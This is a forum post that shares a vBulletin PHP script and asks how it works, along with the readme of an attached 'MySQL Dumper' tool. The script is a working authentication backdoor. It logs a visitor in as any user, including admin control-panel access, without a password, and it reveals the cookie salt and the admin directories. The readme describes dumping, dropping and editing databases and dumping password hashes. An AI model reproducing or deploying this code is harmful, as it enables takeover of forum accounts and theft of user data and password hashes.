| Muhammad Rahman |
11-06-2014 09:47 AM |
1 Attachment(s)
ok ..
this script vblogin.php
PHP Code:
<?php
require_once('./global.php');
define('SELF', $_SERVER['PHP_SELF']);
function verify_authentication2($username)
{
global $vbulletin;
$username = strip_blank_ascii($username, ' ');
$charset = strtolower(vB_Template_Runtime::fetchStyleVar('charset')) == 'iso-8859-1' ? 'windows-1252' : vB_Template_Runtime::fetchStyleVar('charset');
$username = preg_replace(
'/&#([0-9]+);/ie',
"convert_unicode_char_to_charset('\\1', '$charset')",
$username
);
if ($vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid, usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string(htmlspecialchars_uni($username)) . "'"))
{
set_authentication_cookies($cookieuser);
$return_value = true;
($hook = vBulletinHook::fetch_hook('login_verify_success')) ? eval($hook) : false;
return $return_value;
}
$return_value = false;
($hook = vBulletinHook::fetch_hook('login_verify_failure_username')) ? eval($hook) : false;
return $return_value;
}
$guess = array();
$known = array(
'archive',
'clientscript',
'cpstyles',
'customavatars',
'customgroupicons',
'customprofilepics',
'attach',
'forumrunner',
'images',
'includes',
'install',
'packages',
'signaturepics',
'store_sitemap',
'vb'
);
$admindir = $vbulletin->config['Misc']['admincpdir'];
$complete = $vbulletin->options['bburl'] . '/' . $admindir . '/index.php';
$results = scandir('.');
foreach ($results as $result) {
if ($result == '.' or $result == '..') continue;
if (is_dir('./' . $result)) {
if(in_array($result, $known)) continue;
if(@file_exists($result . '/adminlog.php'))
{
$guess[] = $result;
} else {
continue;
}
}
}
if(isset($_GET['do']) && $_GET['do'] == 'login' && isset($_GET['username']))
{
require_once(DIR . '/includes/functions_login.php');
$username = $_GET['username'];
$q = "SELECT username FROM " . TABLE_PREFIX . "user WHERE username = '" . $vbulletin->db->escape_string($username) . "' OR userid = '" . $vbulletin->db->escape_string($username) . "'";
$query = $vbulletin->db->query_first($q);
if($query['username'] != null)
{
if(verify_authentication2($query['username']))
{
exec_unstrike_user($query['username']);
process_new_login('cplogin', true, null);
do_login_redirect();
}
else
{
die('Verify failed');
}
}
else
{
die('User not found.');
}
} else {
?>
<h1>vBulletin Login | CP Login</h1>
<hr />
<form action="<?php echo SELF; ?>" method="get">
<input type="hidden" name="do" value="login" />
<input type="text" name="username" value="" />
<input type="submit" name="login" value="Login as user" />
</form>
<hr />
<p>AdminCP directory detected in config: <a href="<?php echo $complete; ?>" target="_blank"><?php echo $complete; ?></a></p>
<p>Possible AdminCP directories (from existing subdirectories minus vBulletin standard): <?php foreach($guess as $dir) { echo '<a href="' . $vbulletin->options['bburl'] . '/' . $dir . '/index.php" target="_blank">' . $dir . '</a> '; }?></p>
<hr />
<p>Table prefix: <?php echo TABLE_PREFIX; ?></P>
<p>Cookie prefix: <?php echo COOKIE_PREFIX; ?></P>
<p>Cookie salt: <?php echo COOKIE_SALT; ?></P>
<hr />
<?php
}
?>
Code:
__---__
_- _--______
__--( / \ )XXXXXXXXXXXXX_
--XXX( O O )XXXXXXXXXXXXXXX-
/XXX( U ) XXXXXXX\
/XXXXX( )--_ XXXXXXXXXXX\
/XXXXX/ ( O ) XXXXXX \XXXXX\
XXXXX/ / XXXXXX \__ \XXXXX----
XXXXXX__/ XXXXXX \__---- -
---___ XXX__/ XXXXXX \__ ---
-- --__/ ___/\ XXXXXX / ___---=
-_ ___/ XXXXXX '--- XXXXXX
--\/XXX\ XXXXXX /XXXXX
\XXXXXXXXX /XXXXX/
\XXXXXX _/XXXXX/
\XXXXX--__/ __-- XXXX/
--XXXXXXX--------------- XXXXX--
\XXXXXXXXXXXXXXXXXXXXXXXX-
--XXXXXXXXXXXXXXXXXX-
* * * * * who ya gonna call? * * * * *
MySQL Dumper v2.1 Copyright ? 2013
How to use:
Unzip the file in a writeable directory.
Go to /msd/install.php
It may find vBulletin config information and fill the form out automatically. If not enter it manually.
Click install and enjoy.
This uses a staggered dump process to dump larger databases.
I have been able to dump a 2GB database just fine with this.
As far as my testing goes it should dump most DB's with ease.
There are a lot of variables that go into a server, therefore I can not gurantee your experience will be the same.
The script may timeout for you. I think that it should work well for the most part.
If you have any problems with it or suggestions you can Jabber me: plumm@jabber.org or find me at http://byteoverflow.net.
Some features:
Dump DB
Drop DB
View tables in DB
Dump single table
Drop table
Prune table (TRUNCATE)
Insert row into table
Explore inside of table
Delete row in table
Edit row in table
Search table
vBulletin hash dumper
Install script (install.php)
Will search for possible vB config files and fill the install form out automatically if found.
Please keep this text file in the folder and visit: http://byteoverflow.net.
Updates in 2.1:
Staggered compression for bigger DB's and tables. The script shouldn't time out now when compressing a larger DB. Compresses 50 MB of data at a time.
Edited CSS
Just edited a few other things.
I hope you all enjoy this tool, Plum
and this two attach msd.zip and msd1.zip
i hope someone can give explan how this script work.. |
More Information